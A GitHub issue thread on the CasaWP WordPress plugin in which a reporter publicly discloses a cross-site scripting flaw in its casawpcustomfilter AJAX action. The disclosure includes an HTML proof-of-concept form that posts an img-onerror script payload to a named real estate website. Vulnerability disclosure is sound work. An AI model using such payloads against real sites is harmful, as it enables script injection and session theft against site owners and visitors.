### ISSUE TITLE
vulnerabity in the plugin 

### ISSUE THREAD

**Issue by djallalzoldik** [casasoftch/casawp#54]
Hi , i just found XSS vulnerability , but i don't know where i should report , also i want to ask if you provide bug bounty?

**Comment by DimitrijRees** [comment]
Hi,

Thank you for reaching out and for your effort in identifying potential vulnerabilities. As this is an open-source project, we currently do not have a bug bounty program. However, if you're a plugin user or have a vested interest in improving the plugin, we encourage you to share the details through GitHub’s Security Advisory feature.

This will allow us to investigate and address the issue promptly (if it hasn’t already been resolved in our latest security update, version 3.1.2).

Thank you for your cooperation and support in making the plugin better for everyone.

**Comment by djallalzoldik** [comment]
# **Security Report: Cross-Site Scripting (XSS) Vulnerability in CasaWP Plugin**

## **Summary**
An XSS vulnerability was identified in the CasaWP plugin on a WordPress website using the plugin. The issue was discovered while conducting reconnaissance on the website `sbb-immobilien.ch`. The vulnerable endpoint allowed attackers to inject malicious scripts via unsanitized input, potentially compromising user data and the site’s integrity.

Although the affected path has since been disabled on the target site, the underlying vulnerability may still exist in the CasaWP plugin. Below is a detailed account of the issue, along with a proof-of-concept (PoC) demonstrating the attack.

---

## **Vulnerability Details**

- **Plugin Name:** CasaWP  
- **Plugin Functionality:** Real estate property management for WordPress.  
- **Affected Endpoint:**  
  The issue occurs in `wp-admin/admin-ajax.php` via the `casawpcustomfilter` action.

- **Root Cause:**  
  Input parameters, such as `casawp_availability_array`, are not properly sanitized before being processed, allowing attackers to inject malicious HTML or JavaScript.

- **Impact:**  
  Exploiting this vulnerability can lead to:  
  1. Execution of arbitrary JavaScript in the context of the victim’s browser (e.g., session hijacking, phishing).  
  2. Manipulation of website content or behavior.  
  3. Potential compromise of admin or user accounts if logged in.

---

## **Proof of Concept (PoC)**
## NOTE: the exploit wont work know because sbb-immobilien.ch has disabled the function , SO from the POC you can Gues the issue in which part it happen 

The following PoC demonstrates the vulnerability by injecting a script via the `casawp_availability_array` parameter. 

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS PoC Form</title>
</head>
<body>
    <h1>XSS PoC</h1>
    <form action="https://sbb-immobilien.ch/wp-admin/admin-ajax.php" method="POST" enctype="application/x-www-form-urlencoded">
        <input type="hidden" name="casawp_salestype_array" value="buy,rent">
        <input type="hidden" name="casawp_availability_array" value="&lt;img src&#x3D;x onerror&#x3D;alert(00)&gt;">
        <input type="hidden" name="casawp_utility_chosen" value="agricultural,commercial,construction,gastronomy,industrial,investment,parking,storage">
        <input type="hidden" name="casawp_location_radius" value="5">
        <input type="hidden" name="action" value="casawpcustomfilter">
        <button type="submit">Submit Exploit</button>
    </form>
</body>
</html>
